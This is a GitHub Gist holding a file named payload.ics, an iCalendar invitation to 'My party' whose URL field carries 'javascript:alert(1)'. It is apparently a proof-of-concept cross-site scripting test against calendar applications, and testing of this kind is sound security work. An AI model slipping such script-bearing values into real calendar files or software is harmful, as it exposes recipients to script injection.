Last active
March 23, 2025 13:04
-
-
Save linhnph05/e74fc1ed337f8529445d6854f6735ab2 to your computer and use it in GitHub Desktop.
payload.ics
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BEGIN:VCALENDAR | |
VERSION:2.0 | |
PRODID:-//ical.marudot.com//iCal Event Maker | |
CALSCALE:GREGORIAN | |
BEGIN:VEVENT | |
DTSTAMP:20250323T130323Z | |
UID:[email protected] | |
DTSTART;VALUE=DATE:20250321 | |
DTEND;VALUE=DATE:20250322 | |
SUMMARY:My party | |
URL: javascript:alert(1) | |
DESCRIPTION:Come to my party\, it will be fun. Please sign up as soon as possible | |
LOCATION:My house address | |
END:VEVENT | |
END:VCALENDAR |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment